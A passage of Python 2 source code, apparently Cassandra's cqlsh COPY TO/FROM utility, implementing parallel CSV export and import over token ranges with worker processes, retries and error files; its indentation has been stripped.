return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On Windows this dictionary must be pickle-able, therefore we do not pass the
parent connection since it may not be pickle-able. Also, on Windows child
processes are spawned and not forked, and therefore we don't need to shutdown
the parent connection anyway, see CASSANDRA-11749 for more details.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
parent_cluster=shell.conn if not IS_WINDOWS else None,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
from the parent point of view, hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = long(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow(self.columns)
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the out and a boolean indicating if the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'wb'), close=True)
self.num_files += 1
return ret
except IOError, e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate(filter(None, data.split(os.linesep))):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = long(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = long(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = u"[" + u", ".join(self.columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in xrange(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a queue of tuples, where the first tuple entry is a token range (from, to]
and the second entry is a list of hosts that own that range. Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if ret[1] < begin_token:
return None
elif ret[0] < begin_token:
ret = (begin_token, ret[1])
if end_token:
if ret[0] > end_token:
return None
elif ret[1] > end_token:
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = shell.get_ring(self.ks).items()
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
this cases we will not work in parallel, we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, ranges.keys())
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source is a named tuple
wrapping the source input, file name and a boolean indicating
if it requires closing.
"""
def make_source(fname):
try:
return open(fname, 'rb')
except IOError, e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = self.sources.next()
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
self.current_source.next()
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
try:
row = self.current_source.next()
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return filter(None, rows)
class PipeReader(object):
"""
A class for reading rows received on a pipe, this is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable and we have different global counters for giving up when
a maximum has been reached. We consider value and type errors as parse errors as well since they
are typically non recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
self.insert_errors += len(err.rows)
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
columns = u"[" + u", ".join(self.valid_columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options,
self.shell.conn if not IS_WINDOWS else None)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
shell.printerr(unicode(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in case of file the child process would close it). This is a very primitive support
for STDIN import in that we we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print
def import_records(self):
"""
Keep on running until we have stuff to receive or send and until all processes are running.
Send data (batches or retries) up to the max ingest rate. If we are waiting for stuff to
receive check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records(),
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results from the worker processes, which will send the number of rows imported
or from the feeder process, which will send the number of rows sent when it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options, parent_cluster):
mp.Process.__init__(self, target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
self.parent_cluster = parent_cluster
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError, exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = filter(lambda c: c.num_pending() < max_pending_chunks, channels)
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception, exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
An child worker process, this is for common functionality between ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
mp.Process.__init__(self, target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.parent_cluster = params['parent_cluster']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
An child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
try:
self.inner_run()
finally:
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = unicode(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in self.hosts_to_sessions.values())
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect we report an error so that the token will
be retried again later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception, e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in self.hosts_to_sessions.keys():
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(map(self.format_value, row, cql_types))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception, e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
return formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
def close(self):
ChildProcess.close(self)
for session in self.hosts_to_sessions.values():
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
